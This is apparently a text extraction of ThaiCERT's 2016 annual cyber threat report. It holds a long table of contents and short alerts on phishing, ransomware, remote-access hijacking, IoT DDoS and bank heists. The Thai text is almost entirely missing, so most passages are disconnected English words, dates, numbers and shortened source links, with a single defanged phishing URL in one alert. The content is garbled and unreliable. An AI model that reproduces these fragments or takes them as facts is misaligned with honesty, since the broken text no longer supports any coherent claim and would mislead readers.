Cyber Threat Alerts 2016

2
CYBER THREATS 3
2016
CYBER THREATS 2016
ThaiCERT
, ,
, Martijn Van Der Heide,
, ,
, , ,
, ,

1 2560
3,000
300
.. 2537
()
(Thailand Computer Emergency Response Team: ThaiCERT)
() (.)
Electronic Transactions Development Agency (Public Organization) (ETDA)
Ministry of Digital Economy and Society
()
20 33/4 9

10310
: 0 2123 1212 | : 0 2120 1200
: office@thaicert.or.th
: www.thaicert.or.th
() : www.etda.or.th
: www.mdes.go.th

Thailand 4.0

2559

()

SWIFT
5
SMS

Cyber Threats 2559 fb.com/thaicert twitter.com/thaicert

Statistic
Research
& Education ( )

()

Awareness
Mastercard ................................31

32
..........................34

blockchain....................................................................................35
iPad Pro 9.7
iOS 9.3.2

.........36

.....................................................................................37
SandJacking

iOS
.........................................................38
Social Network
.........................................................40
TeamViewer

442

44
446
TeamViewer
447

..........49

.................................................51
Google

2
OTP.................................53

.....................54

.....................55

Facebook556

Malvertising ..................58
Windows XP............................59
1234660

...........................................................................................61
Tinder

............................................62

Pokemon GO663
Firefox

Windows.............................66
social engineering667
iPhone

6 68

69
CloudFlare
WordPress

....................................................70
ATM skimming ...................................................71
SDK

...................................................................................72

...........................................................73

......................................................................................74
Microsoft EMET
2561
Windows 10..............................................75
SHA-1
2560 35% . ..................................................................................76

...............................................77

Star Wars - Rogue One..................................................................................78

880

Fraud
Netflix ....................................................83
Apple
SMS Apple ID.....................84
iOS 9.3..................................85

..............86
Facebook Facebook.........................................87

LINE 500 Free Coin
....88
ISP Game of Throne.............89
FBI

...........................................................................90
PayPal
PayPal.................................................................................................91

..........................................................................................92
GoDaddy

..............................................93
DSI VoIP . ............94

WhatsApp Facebook.........................................................96

1,500 .....................................................................................................97

...................................................................98
iPhone

Apple ID .............................................................99
Incident

.................................................................... 101
MedStar Health ...................................... 102
FBI

53............... 103
Panama Papers

............ 104

............................................................................................................ 105

...................................................................................................... 106

. .................................................... 107
ISIS
.................................................... 108
Qantas Wi-Fi

......................................................................................................... 109
FBI

......................... 110
Microsoft Platinum

................................................................................................. 111

SWIFT ........... 112

GhostShell 32
FTP.............................................................................................. 113

................................................................................................. 114

SWIFT 12 ................................................... 115
Twitter 2,500
/...................................... 116

..................................................... 117

SWIFT

Sony Pictures.............................................................................. 119
TeamViewer

......................................................................................... 120

...................................................... 121
Twitter Pinterest
LinkedIn .................................................................... 122
Toyota Lexus

1 123
7 ................. 124

Twitter
2
............................................ 125
GoToMyPC

............................................................................. 126
Twitter Twitter
Mark Zuckerberg............................................... 127
SWIFT
10 ...................................................................................... 128
Lizard Squad
DDoS
.................................................................................. 129
iOS
iCloud
........................................................................... 130
Marriot Hyatt

.................................................. 131
Steam
9.1 .............................................................. 132
Epic Games 8 .................................. 133
Fitness Tracker McDonalds
........................................................................ 134
FBI

....................................................................... 135
macOS 10.12 (Sierra)

Razor kernel panic..................................................................................... 136
OVH DDoS 1.1 Tbps
IoT................................................................................................ 137
1.5
botnet
DDoS1 138
............................................................................... 140
GlobalSign

..................................................................... 141

.................................................................................................. 142
Tesco Bank
20,000 ....................................................... 143
DDoS
IoT.................................................................................... 144
Lenovo Windows Server 2559 November

.................................................................................................................. 145
ATM ......................................... 146
ISP
DDoS
1
Mirai....................................................... 147

.................................................. 149

HIV ................................. 150
Skype
................................................................................................................. 151
1
......................................................................................................... 153
Leet DDoS 650 Gbps.................................. 154

................................................................................................... 155

Law & Policy
Anonymous

#OpSafePharma1 157
Open source

............................................................................................... 158
NIST

1 159

SpyEye 24 1 160

1 161

1 162

.............. 163

LulzSec
.................................................................................... 164

................................................................... 165

......................................................................................... 166

........................................................................................ 167

....................................................................................................... 168
50
45 ......................................................... 169

..................................................................... 170

.......................................................................................................... 171

...................................................................................... 172

Kickass Torrent
Apple, Facebook Coinbase................................................................................ 173

DDoS

2557.......................................................... 174
.................. 175

.................................................................................................................... 176
Verizon 5
1 177
Mozilla
WoSign
StartCom Apple .................................................................. 178
FBI

Lizard Squad PoodleCorp............ 179
IoT
CSA

1 180
Apple Watch

............................................................. 181
G7
1 182

IoT

......................... 183
FCC ISP
1 185
2559-2564.................................................... 187
NIST Homeland Security

IoT1 188

................................................................... 189
NIST

.................................. 190

1 2560.................................................................... 191

Malware
Emisoft Lab

HydraCrypt UmbreCrypt............................................................................................ 193
Linux Mint Backdoor ISO........................ 194
CTB-Locker

................. 195
Porn clicker Google Play.............................................................. 196
KeRanger
Mac.................... 197
TeslaCrypt
4.0

..................................... 198
Android Flash Player

Google............................................................ 199
Petya MFT

................ 200

............................... 201
Android.Lockdroid Android

................................................................................................. 202
Google Play Store 100 ............ 203
OSX.Pirrit Mac OS X ..................................... 204
CryptoHost .rar .............. 205
! Amazon........................................... 206
Jigsaw

................................................................. 207
ATM

...................................................................... 208
SamSam JBoss

.................................................................. 209
CryptXXX
Bitcoin............................................................................................... 210
TeslaCrypt

............................................................................................................. 211
Android root

........................................................................................ 212
! Play Store

.............................................. 213
Pirate Bay
........................ 214
CryptXXX ..................................................................... 215
7ev3n-HONE$T

................................ 216
Internet of Things (IoT)

.......................................................................... 217
Alpha ........................................................................ 218
FBI

................................................................ 219
Android

SMS................................................................................. 220
Google Play Store
.............................................................................. 221

Dridex
Cerber.......................................................... 222
.............................................. 223
CryptoXXX 2.0 ...................................................... 224

TeslaCrypt

2 225
! WhatsApp Gold
............................... 226
ZCryptor
.zcrypt..................................................................................................... 227
Asus LiveUpdate

2 228
Android
URL
.......................................................................................... 230
FLocker
Android...................................... 231
iOS App Store
SDK 2 232

TeamViewer

.................................................................. 233
True Lenovo P1m
................................ 234
JavaScript
.................................................................................... 235
Godless Play Store
root
..................................................................... 236

OTP............................ 237

Facebook

....................................................................... 238

Office 365.............................. 239
LevelDropper Play Store
root
........................................................................... 240

................................................................................... 241
Hummer Android
35,000 root
.......................... 242
Mac
........................................................................................................ 243
Keydnap Mac ..................... 244

Pokemon GO ......... 245
Ranscam
........... 246
Europol

......................................................................... 247
Microsoft ..WSF (
. 2 )............. 248
SpyNote Android
........................................................................................................ 249
FossHub Audacity Classic Shell............ 250
Google Play Store 155

2.8 ..................................................................................... 251
Shortcut........................................... 252
Cerber

..................... 254
Svpeng Android Google AdSense
................................................................................................... 255

........................................................ 256
Rex
Linux
Bitcoin DDoS............................................................................................................. 257
Wildfire
..................... 258
Pegasus iOS

iOS 9.3.5 !.............................................................................................. 259
Locky
DLL............................. 260
Transmission ()
Keydnap Mac OS X................................................................................. 261
DressCode Google Play Store
Botnet............................................................................................ 262
Cerber
............................... 263
Gugi

Android 6....................................................................... 264

NAS Seagate................................................................................... 266
iOS 75

App Store............................................................. 267
.hta .......................... 268
Guide for Pokemon GO Play Store
root
......................................................................... 269
Komplex Mac OS X
..................................................................... 270
Xiny Android Play Store
root ............................................. 272
MarsJoke

96 ......................................................... 273

Xpan
remote desktop................................................................................................... 274
Mirai IoT
DDoS ....................................................................... 275

Cerber

4 ....................................................... 276
Symantec Odinaff

macro.................................................... 277
NyaDrop

IoT Linux.............................................. 278
Mirai
Sierra Wireless
.......... 279
Microsoft Locky .LNK.............. 280

Google AdWords
macOS
............................................................... 281
Svpeng
Google Chrome Android
.apk . ................................................................... 282
Mirai

(DVR) ............................. 283

Facebook
....................................................................................................... 284
Keygen

........................................................................................... 285
Gooligan Android
Google Account............................................... 286

Android

2 287
Super Mario Run Android
................................................................................... 288
Privacy
FBI Apple iOS

................... 291
Home Depot 19.5

.................... 292

QQ Browser

................................................................................ 293
CNBC

.............................................................. 294
50 .................................................................................. 295
.

........................................ 296

2 297

VPN Opera
Proxy......................................... 298

....................................................................................................... 299
1.5 GB
SQL injection................................................................................................... 300
Facebook 2558

13%................................................................. 301
Telegram
SMS OTP ............................................................ 302
NHS 1.6
Google
AI........................................................................................................... 303
Google, Yahoo, Microsoft 272

.............................................................. 304
Twitter ................................................................ 305
Runkeeper

3 306
! LinkedIn

2555 ............................................................................ 307
LinkedIn

123456...................... 308

Anonymous
33 .................................. 309
Facebook ..................................................................... 310
Tumblr ...................... 311

............................................................................. 312
TeamGhostShell
MongoDB 36 ......................................... 313
Facebook Netflix

.............................................................. 314
Flash Keyboard
Play Store 3 315
GitHub
2FA3 317
Mark Zuckerberg
.......................................................................... 318
LogMeIn

............................................................... 319
154
....................................................................................................... 320
Google
...................................................................................................... 321
22

3 322
Maxthon Browser
.............. 323
EFF

................................................... 324
Dota 2 2
.................. 325
Minecraft World Map 71,000 .......... 326
Dropbox 60 ..................................... 327
Seagate
3 328
Yahoo 500
....................... 329
Dropbox 60

................................................................................... 330

Dailymotion 85 .................................. 331
Research & Education

......................... 333

........................................................... 334

KeySniffer
.................................. 335

/............................................................. 336

3 337

white-hat hacker
100 ......... 338
3 339
F-Secure Helsinki

.................... 340

iPhone 5c

...................................................................................................... 341
Europol
25593 342
(NCSC)

700 ............................................................................................................. 344

........................................................................ 345

Smart Nation3 346
Singtel

cybersecurity.......................................................................................... 348

CPU
machine learning................................................................................................... 349

Phillips Hue....................................................................................... 350
IBM
................................................................ 351

..................................... 352

354
2 ................................................................................................ 353
NIST NSRL

......................................................................... 354
Statistics

2558

Star Wars

..................... 357
FBI 2.3
2
........................................................................................... 358
Apple iOS 80
Touch ID 89%..................................................................................................... 359
Kaspersky DDoS 2559......................... 360
PandaLabs 2559

227,000 ................................................................................ 361
........................................................................ 362
Windows 1 4 Internet Explorer
Flash Java........................................................................................................ 363
Ransomware
90,000
.......................................................................................... 364
Ransomware 2559
10
2558........................................................................ 365
4
........................................................................................ 366
58 59
2.3 ......................................................... 367

3 368

10
6 369

3 370
DDoS 2559
124,000 579 Gbps....................................................... 371

88% ..................... 372
Kaspersky DDoS 2559
Linux Botnet....................................................................... 373

...................................................................................................................... 374

21
....................................................................................... 375

2559

200%......................................................................... 376
1 5
...................................................................................................... 377

........................................................................................................... 378
40% Word3 379
Sucuri

2559
WordPress
Joomla!....................................................... 380

DDoS 1
................................................................................................... 381
1 10
.............................................................................................. 382
Android
1
Play Store..................................................................................... 383
89%
Wi-Fi
.......................................................................... 384

NTT Security

3 2559

............................................................................. 385
15%
20% Telnet
....................................................... 386

................................... 387

77%
95% .................................................................................................... 388
Akamai 3 2559
IoT

........................................................................ 389
66%

................................................................. 390
Flash Player, Internet Explorer Windows

.................................................................................................................. 391
UK 90% Windows XP

2 .............................................................................................. 392
1 5

. .................. 393
Vulnerability & Patch
Google 2559

Nexus............................................................. 395
VMware privilege escalation
Shared Folder........................................................................................................ 396
OpenSSH Private Key

.................................................................................................................. 397
Debian
...................................................... 398
Microsoft, Adobe, Google, Mozilla Apple
.. 593 399
Truecaller
Android 100
.................................................................. 400
iOS 9 - 9.3.1

Passcode ................................................................................................ 401
Cisco
....................................... 402
Adobe Flash Player 21.0.0.213

................. 403
Samsung Galaxy

. SMS . ..................................... 404
QuickTime Windows

Apple .................................................. 405
Cisco
....................................... 406
HP Data Protector

.................................................... 407
Firefox 46
................................................ 408
Chrome

.................................. 409

ImageMagick
........................................................................ 410
Apple Xcode 7.3.1 Git

.............................................................................. 411
OpenSSL
......................................................... 412

Cisco Cisco TelePresence................................ 413
HTTPS

............. 414
WordPress 4.5.2
........................................ 415
Microsoft Adobe
.................................................................................................... 416
Adobe Flash Player 21.0.0.242 ............. 417
WordPress
Jetpack
XSS ...................... 418

.............................................................................................. 419
Samsung KNOX Samsung Galaxy

............................................................................................................... 420
KeePass 2 HTTP

............................................................................... 421

Lenovo Lenovo Accelerator Application
.................................................................................... 422
Mitsubishi Outlander
................ 423
KeePass HTTPS
............................................................................................................ 424
D-Link

................................... 425
! Samsung Software Updater

..... 426
Adobe Flash Player !

(CVE-2016-4171)................................................. 427
Symantec
Norton

..................................................... 428
Foxit Reader 8.0

............................................................ 429
LibreOffice

RTF............................................................................ 430
Wget
1.18
redirect
........................................................................... 431
ThinkPwn BIOS
Lenovo, HP Gigabyte........................................................ 432

Microsoft
(CVE-2559-3238)...................................................................... 433
iOS Mac OS X

MMS, , ................................................. 434
Internet Explorer Edge Microsoft Account
.................................................................................................................. 435
Quadrooter Qualcomm Snapdragon
Android root
........................................................................... 436
!
Cisco

Equation Group.............................................................. 437
Apple OS X

........... 438
Cisco WebEx Meetings Server ....... 439

Drupal .............................................................................. 440
Cisco 850,000

0-day
BENINGCERTAIN....................................................................... 441
Samsung Knox

................................................................ 442

....................................................................................................... 443
Avtech
130,000 .................................................. 444
Pork Explosion Android

....................................... 446
Akami SSHowDowN OpenSSH
IoT
DDoS......................................................................................... 447
Nine Android
........................................................................................... 448

Netis, D-Link,
Asus 3 ............................................................................................................. 449
Dirty COW Linux (CVE-2559-5195)
root ................................................................................................ 450
Joomla! 3.6.4
.................................................................. 451
Adobe Flash Player
............................................................................................. 452
Joomla! 3.6.4
25,000
........................................................................................ 453
MySQL, MariaDB PerconaDB

(CVE-2559-6663, CVE-2559-6664).... 454
D-Link DIR

remote administration.......................... 455
MacBook Pro 2016 Touchbar SIP ()
Apple ............................................................................................ 456

Netis 15,000

2
..................................................... 457
0-day Firefox

Tor Browser ....................................... 458

4 459
Sony 80

.................................................................................................... 460
Netgear
......................................................................................... 461
! Joomla! 3.6.4
admin ............................................................................................................. 462
Netgear R6250, R6400, R7000 R8000

......................................................................................................................... 463
Netgear ZyXEL
.................................................................................................... 464

........................................................................................................................... 466
30
Awa re n e s s
CYBER THREATS 31
2016
Mastercard

()

92%

: 25/02/2558
: BBC <http://thcert.co/TNJPbn>
32

(http://www.manager.
co.th/Home/ViewNews.aspx?News-
ID=9590000026501)
IT data center

data center
manager

3.
FM-200, Novec 1230
3

1.
CO2
data center
data center 2

2.

CYBER THREATS 33
2016
3.

1.

4.

2.

: 2/25/2559
:
( Infrastructure Network )
<http://thcert.co/mx65S0>
34

HackerOne 150,000
Hack the Pentagon 18
12 2559

: 4/4/2559
: U.S. Deparment of Defence
<http://thcert.co/4TCbKj>
CYBER THREATS 35
2016

blockchain
Defense Advanced
Research Projects Agency (DARPA)

blockchain

: 4/26/2559
: ZDNet <http://thcert.co/HEIWJY>
36
iPad Pro 9.7 iOS 9.3.2

16 2559 Apple Apple
iOS 9.3.2
iPad Pro 9.7
Apple support
iPad Pro 9.7
iOS 9.3.2

: Apple
: 19/05/2559
: Phone Arena <http://thcert.co/Y9Go0f>
CYBER THREATS 37
2016
ICPA
Industrial Cybersecurity
Promotion Agency (ICPA)

2560
2563

: 23/05/2559
: Softpedia <http://thcert.co/1WTXlu>
38
SandJacking
iOS
iOS ()

Android iOS
iOS App Store

GPS
iOS

(

https://www.thaicert.or.th/papers/
technical/2014/pa2014te003.html) Su-A-Cyder

Black Hat Asia

iOS

Apple
Xcode 7
iOS 8.3 Apple
Apple ID
CYBER THREATS 39
2016
Apple
iOS
SandJacking
Backup
Restore SandJacking
Backup iOS Apple
iOS
Backup Restore

Restore
Backup
: 28/05/2559
: Security Week <http://thcert.co/HsHn0M>
40
Social Network

4.

5.

6.

7. Do Not
Track

ETDA
8.

1.

9.
2.

10.
3. URL

: 28/05/2559
: ETDA <http://thcert.co/QwA48k>
CYBER THREATS 41
2016
42
TeamViewer

TeamViewer
Remote Desktop

1
2559 ()
TeamViewer
2 (2-Factor
TeamViewer Authentication)

The
Register
TeamViewer
2

TeamViewer
DNS

CYBER THREATS 43
2016
3. TeamViewer
TeamViewer
1. 4.
VNC
2. 2
( http://www.teamviewer.
com/en/help/402-How-do-I-acti-
vate-deactivate-two-factor-authenti-
cation-for-my-TeamViewer-account.
aspx)
: 02/06/2559
: Inquisitr <http://thcert.co/P35ukG>,
Reddit <http://thcert.co/YVTgBF>,
TeamViewer <http://thcert.co/5jDUro>
44

2.

3.

4.
Tripwire

5.
1.

HTTPS

SD Card 2 (2 Step Authentication)
CYBER THREATS 45
2016
6. Wi-Fi 9.

VPN
7. 9

8.
: 06/06/2559
: Tripwire <http://thcert.co/r0NsQA>
46

1.
appIe.com I ()
l ()
Infosec
Institute
2.

googlr.com
-
3.

ebay-payment.com

- Redirect

URL

URL
-
3
: 07/06/2559
: Infosec Institute <http://thcert.co/JmjklZ>
CYBER THREATS 47
2016
TeamViewer
TeamViewer

1.
TeamViewer 2 (2 Factor Authentication)
2 www.teamviewer
Trusted Devices .com Edit Profile
Two factor authentication
Activate
2

2 Google Authenticator
TeamViewer 2.
(
2 Blacklist (
TeamViewer ) ) Whitelist
Data Integrity (
)
TeamViewer
Extras > Options Security
Configure Black
and Whitelist

48
3. 4. Windows
Team- TeamViewer
Viewer
4 Extras > Options >
Advanced > Show advanced
options Always
Whitelist Lock Remote Computer
Extras > Options > Security
Password strength
Disabled

Secure Very secure

: 07/06/2559
: TeamViewer <http://thcert.co/69cNpR>,
Reddit <http://thcert.co/kc6kYW>
CYBER THREATS 49
2016

Kaspersky
Android
iPhone
Serial
Android (
Android 4.4 5.0)
Android
6.0

iPhone

Pair

Android
AT command (
Black Hat Europe 2014 https://www.
Serial blackhat.com/docs/eu-14/materials/
Firmware eu-14-Pereira-Charge-Your-Device-
With-The-Latest-Malware.pdf)

50

Serial

: 08/06/2559
: Security Affairs <http://thcert.co/ZI22Ni>,
Kaspersky <http://thcert.co/PEzwjF>
CYBER THREATS 51
2016
DBS OCBC

DBS

2560
OCBC
2559
Voiceprint
(
)

(Fingerprint)
Citibank
66% Citibank

52

(Authentication) 3 1 2 (
ATM + +
1. (Something you know) SMS OTP)
ATM 3
2. (Something you have)
ATM
3. (Something you
are)
: 17/06/2559
: Computer Weekly <http://thcert.co/MkdYPO>
CYBER THREATS 53
2016
Google
2 OTP
2

OTP (One https://myaccount.google.com
Time Password) SMS Sign-in & Security > 2-Step
Verification > Google prompt > ADD
PHONE
(
Google 1 )
2
Android iOS
iOS
OTP Google app

2
Google
(https://www.
thaicert.or.th/papers/general/2015/
pa2015ge001.html)
: 23/06/2559
: Mashable <http://thcert.co/pSuZWz>
54

Security Affairs

2558 Jeremy
Cook 18 Remote Wipe

: 24/06/2559
: Security Affairs <http://thcert.co/Z3a5oI>
CYBER THREATS 55
2016

https://odette.
carto.com/viz/c5cf5b84-fdb9-11e5-
bbd7-0e3a376473ab/embed_map
Protection1
6,000

http://www.insecam.org/en/bycoun-
try/TH/

Los Angeles, San Francisco
New York

: 24/06/2559
: Protection1 <http://thcert.co/Bqg5iu>
56

Facebook
Naked Security (Privacy) >
(Who can see my stuff?) >
Facebook
(Who can see your future
1. posts) (Friends)

Facebook

(Public) (Setting) >
Facebook (Privacy) >
(Who can
see my stuff?) >

(Limit the audi-
ence for posts youve shared with
friends of friends or Public)
(Limit Old posts)
Facebook

Profile
... > (View As..)

(Setting) >
CYBER THREATS 57
2016
Profile
Facebook

2. Facebook 2
Facebook
Facebook

Facebook
SMS

2
Facebook (Setting) >
(Security) >
(Login Approvals)
Facebook

(Setting) >

(Privacy) >
(Who can look me up?) (Setting) > (Security)
> (Login Alerts)
3.
2
: 27/06/2559
: Naked Security <http://thcert.co/2xuOWh>
58
Malvertising

MSN, BBC
Malvertising (
Malware + Advertising)
Malwarebytes 70%
Malvertising

Malwarebytes
Adobe Flash Player,
Adobe PDF Reader, Java

: 27/06/2559
: Malwarebytes <http://thcert.co/iZ49JU>
CYBER THREATS 59
2016
Windows XP
TrapX
( Windows XP
MEDJACK
medical device hijack Windows )

Backdoor

Botnet
TrapX

Windows XP
: 29/06/2559
: The Register <http://thcert.co/KSigvM>,
TrapX <http://thcert.co/2lj8X3>
60

1234
Smart home security system

SMS

1234 admin1234

: 30/06/2559
: heise online <http://thcert.co/lJ1s3x>
CYBER THREATS 61
2016

3.
(Whitelist)

4. Log

Log
1.

XP

Firewall
(https://www.
thaicert.or.th/papers/general/2014/
pa2014ge001.html)
2.

: 29/06/2559
: The Register <http://thcert.co/KSigvM>,
TrapX <http://thcert.co/2lj8X3>
62
Tinder

Symantec
Tinder

118.76

: 22/07/2559
: Help Net Security <http://thcert.co/k5rvDP>,
Symantec <http://thcert.co/Skd5lM>
CYBER THREATS 63
2016
Pokemon GO
Pokemon GO -
Android iOS

2559

6 2559
-

GPS

-
()
Pokemon GO

( http://gizmodo.com/
armed-robbers-used-pokemon-go-
to-find-9-victims-1783416898)

64
-

-
( http://www.straitstimes.
com/world/united-states/pokemon-
goes-to-court-in-backyard-monster-
trespassing-case)

-

(
https://www.theguardian.com/
technology/2559/aug/01/pokemon-
go-banned-sex-offenders-new-york)

( http://
-
www.standard.co.uk/news/world/

pok-mon-go-japanese-officials-plead-
(
with-people-to-stop-playing-game-in-
http://www.androidcentral.com/
hiroshima-memorial-park-a3306701.
researchers-find-remote-access-tool-
html)
side-loading-pokemon-go-apk)
-
- Google

CYBER THREATS 65
2016
-
Google
( http://www.ktnv.
com/news/contact-13/new-scam-
targets-pokemon-go-players)
: 08/08/2559
: ThaiCERT <http://thcert.co/RYqBRy>
66
Firefox
Windows
Mozilla Firefox Firefox
(digital Firefox
certificate) 49
Firefox
Windows Windows
access:config
address bar Firefox
( root certificate) settings security.
Firefox enterprise_roots.enabled

Firefox 49
13 2559
: 05/09/2559
: Softpedia <http://thcert.co/M1xgsd>
CYBER THREATS 67
2016
social engineering
Social engineering

3.

social
engineering (phishing)

1.

2.

: 07/09/2559
: Brightmove <http://thcert.co/lQKWw1>
68

iPhone
- Find my iPhone
Apple iPhone
iPhone iPhone
activate (https://support.apple.com/
kb/PH2702?locale=th_TH&viewlo-
cale=th_TH)
iPhone -
iOS
iMessage
- iPhone Apple (https://support.apple.
Watch Apple Watch com/th-th/HT203042)
(https://support.apple.com/th-th/
HT204568) -
(Erase
- All Content and Settings) (https://
support.apple.com/th-th/HT201274)
SMS
iTunes
iCloud (https://support.apple.com/
th-th/HT203977) https://
icloud.com/find
: 09/09/2559
: Apple <http://thcert.co/bBvYIV>,
Graham Cluley <http://thcert.co/z02G3Y>
CYBER THREATS 69
2016
1.

(Security
Question)
(
)

2.

(
)

: 19/09/2559
: Kaspersky <http://thcert.co/slrzJW>
70
CloudFlare
WordPress

CloudFlare

WordPress
CloudFlare

web application
firewall (WAF), cache ,
SSL,

CloudFlare

WordPress (https://wordpress.
org/plugins/cloudflare/)
: 23/09/2559
: Softpedia <http://thcert.co/pexLau>
CYBER THREATS 71
2016
ATM skimming

ATM skimming 2559
Kaspersky

skimmer
ATM

( 12
ATM skimmer
https://www.thaicert.or.th/
papers/general/2013/pa2013ge009. GSM
html)
EMV Chip-and-PIN

(biometrics)

: 03/10/2559
: The Merkle <http://thcert.co/zn6G4I>,
The Register <http://thcert.co/EEzi6p>
72
SDK

Palo Alto Networks Android 2.8

Virus Bulletin
International Conference

(abandonware)

SDK (software
development kits)

SDK

SDK

: 10/10/2559
: Search Security <http://thcert.co/aioGCx>
CYBER THREATS 73
2016

(IAEA - International Atomic
Energy Agency)

3-4
2557
(
)

: 12/10/2559
: ZDNet <http://thcert.co/eifhLU>
74

Facebook

( )

: 14/10/2559
: ThaiCERT <http://thcert.co/tGWVLM>
CYBER THREATS 75
2016
Microsoft
EMET 2561
Windows 10
EMET
Microsoft EMET
Windows 10
Windows
EMET
(
EMET https://www.thaicert.or.th/
papers/technical/2013/pa2013te005.
html) Windows 10 ()

3 2559
Microsoft
EMET
2561
Windows 10
: 07/11/2559
: ZDNet <http://thcert.co/7OI7Ox>
76

SHA-1 2560
35%
(digital certificate)
SHA-1 HTTPS

Lets Encrypt
(https://letsencrypt.org/)
HTTPS
2560 SHA-1
SHA-2
SHA-1 HTTPS 2560

HTTP

Venafi 35%
SHA-1
2560

: 18/11/2559
: Information Security Magazine <http://thcert.co/9jk1rl>,
Venafi <http://thcert.co/hnDZMS>
CYBER THREATS 77
2016
2559 Mobile Connect

OpenID Connect
3 M1,
StarHub Sigtel OAuth 2.0
Mobile
Connect

Mobile Connect
GSMA
(http://www.gsma.com/personaldata/
mobile-connect)
API

2560
: 01/12/2559
: ZDNet <http://thcert.co/ejlIzM>
78

Star Wars - Rogue One
:

Rogue One: A Star Wars
Story Star -
Wars 3 4

Death Star
-

- - (data center)

-

(data leak prevention)

-

CYBER THREATS 79
2016
- -
1

: 22/12/2559
: Slate <http://thcert.co/U0scCe>,
Threat stack <http://thcert.co/w7DqwT>,
Preservica <http://thcert.co/E8jYc3>
80

(

)

Wi-Fi

: 26/12/2559
: 9News <http://thcert.co/eT5Hk3>
82
Fraud
CYBER THREATS 83
2016
Netflix
Symantec
Netflix
(Phishing site)

Netflix
Netflix

URL

Netflix Symantec
Infostealer.Banload
: 15/02/2559
: Softpedia <http://thcert.co/CeGKlX>
84
Apple SMS
Apple ID

SMS AppleInc (Phishing)
SMS Apple ID

SMS
Apple URL

2

Apple ID

Apple
ID
: 12/04/2559
: Graham Cluley <http://thcert.co/4SyShc>
CYBER THREATS 85
2016

iOS 9.3

iOS
iOS 9.3
taig9.com
taig.com
TaiG

iOS iOS
en-pangu.com
Pangu en.pangu.io
: 19/04/2559
: Mobipicker <http://thcert.co/3ZfLMX>
86

Financial Fraud Action
UK
2558

72%
168.8

: 20/04/2559
: Help Net Security <http://thcert.co/tqvxfm>
CYBER THREATS 87
2016
Facebook
Facebook
Netcraft
Facebook

Facebook
HTTPS facebook. Login Alert
com
Login Approval

2
: 28/04/2559
: Netcraft <http://thcert.co/GM0qcC>
88
LINE 500 Free

Coin
LINE
LINE 500
Free Coin

LINE
LINE

: 15/06/2559
: <http://thcert.co/0gdoLd>
CYBER THREATS 89
2016
ISP
Game of Throne
TorrentFreak HBO

HBO
Game of Throne
ISP
Game of Throne

72

: 08/07/2559
: News <http://thcert.co/ERcek0>,
TorrentFreak <http://thcert.co/yoT4qj>
90
FBI

FBI 2.3
International Conference on Cyber
Security
FBI
CEO

CEO

FBI
2556 2559
2
17,642
: 01/08/2559
: CNN <http://thcert.co/wnHfi9>
CYBER THREATS 91
2016

PayPal PayPal
Proofpoint
Proofpoint
PayPal
PayPal Proofpoint
Youve got a money request
members@paypal.
com
PayPal
PayPal

(
100 URL)
PayPal

URL
Google (goo.gl)
Zeus

: 03/08/2559
: Hackread <http://thcert.co/KTP2sE>,
Proofpoint <http://thcert.co/onyBrS>
92

9 2559

(.
.)

Twitter

: 10/08/2559
: <http://thcert.co/gXBNxO>,
<http://thcert.co/AFg96J>
CYBER THREATS 93
2016
GoDaddy
DEFEND Magazine
(hxxp://
GoDaddy mtparent.com/themes/www.html)

GoDaddy

GoDaddy
support@godaddy.com

20 GB 24 URL

: 29/08/2559
: DEFEND Magazine <http://thcert.co/1hbGOX>
94
DSI VoIP
.
(DSI)
0 2831 9888
DSI

.
DSI

() ATM

DSI
DSI

DSI .
0 2831 9888
DSI
DSI .
.

. DSI
VoIP
DSI .

. 0 2831 9888
CYBER THREATS 95
2016
DSI

DSI

DSI
ATM
: 30/08/2559
: (DSI) <http://thcert.co/4owTG7>
96
WhatsApp
Facebook
2559 1.
WhatsApp
Facebook
2556
WhatsApp
Facebook

Facebook 2.
30

Setting () >
Account ()
Share my account info
()

WhatsApp
Facebook WhatsApp
2 Facebook

: 30/08/2559
: NakedSecurity <http://thcert.co/tKrRhS>,
WhatsApp <http://thcert.co/GcWDuR>
CYBER THREATS 97
2016

1,500
Leoni AG

2559

2559 FBI
1,500
1

( )

: 02/09/2559
: Softpedia <http://thcert.co/GJvLmh>,
Leoni <http://thcert.co/Y6Pqxx>
98
Trustwave

(Point-of-Sale)

Trustwave

3 social engineering
Carbanak

1 2556-2557

: 15/11/2559
: Computer World <http://thcert.co/fSZdEe>,
Trustwave <http://thcert.co/ScV7fq>
CYBER THREATS 99
2016
iPhone

Apple ID
Pantip SMS
iPhone Apple ID
iCloud Apple
(Lost mode) Find My iPhone
Apple ID

(Factory reset)
OTP
Apple ID

(Phishing) SMS Find My
iPhone
Apple
iOS
Apple ID Apple ID
Apple
ID

2
: 28/12/2559
: Pantip <http://thcert.co/m5HJtk>
100
Incident
CYBER THREATS 101
2016

7
7
2554-2556
DDoS

7

: 28/03/2559
: We Live Security <http://thcert.co/xlQkSe>
102

MedStar Health
28 2559 MedStar Health Inc.
MedStar
Health Inc.
(Ransomware)
17,000

FBI

: 30/03/2559
: Inquisitr <http://thcert.co/RQv7FK>
CYBER THREATS 103
2016
FBI
53
FBI

(Office of Personnel Management)
2553 FBI
(https://otx.alienvault.com/
pulse/56c4d1664637f26ad04e5b73/)
1

: 07/04/2559
: Motherboard <http://thcert.co/XaJ9CA>
104
Panama Papers

Mossack Fonseca

Wired

Drupal

2555
(SSL v2)

Wikileaks

: 07/04/2559
: Naked Security <http://thcert.co/O4xDhj>,
Wired <http://thcert.co/IJHCSi>
CYBER THREATS 105
2016

(Department of Homeland Security)
2558

(Energy Sector) 103
6

Call Center
17 2557

: 07/04/2559
: DHS <http://thcert.co/SSEqsM>,
CNN <http://thcert.co/HMO75G>,
The Register <http://thcert.co/TIAMi2>
106

Check Point

Taobao
ebay
Qihoo 360
Whitelist

Google Play,
App Store

: 12/04/2559
: Check Point <http://thcert.co/HRmcAn>
CYBER THREATS 107
2016
2558
Eddie Tipton
()

14.3

6 DLL

Eddie
Tipton DLL DLL

DLL
: 22/04/2559
: Security Affairs <http://thcert.co/bTx0Kh>
108
ISIS
ISIS
ISIS
Cyber Caliphate Army (CCA) Junaid
ISIS Hussain
Sons Caliphate Army (SCA) 2558,
Kalacnikov.TN (KTN) 2559
United 2559
Cyber Caliphate UCC
ISIS

(Web Defacement)

50,000 ,

3,602
: 28/04/2559
: Softpedia <http://thcert.co/1hviX9>,
The New York Times <http://thcert.co/v2eZBC>
CYBER THREATS 109
2016
Qantas
Wi-Fi
Qantas
40
2
Wi-Fi hotspot Mobile
Detonation Device

Wi-Fi
: 02/05/2559
: Mashable <http://thcert.co/XFyaav>
110
FBI

FBI

SWIFT
81

SWIFT

FBI
1

: 11/05/2559
: CIO <http://thcert.co/ohW5Lv>,
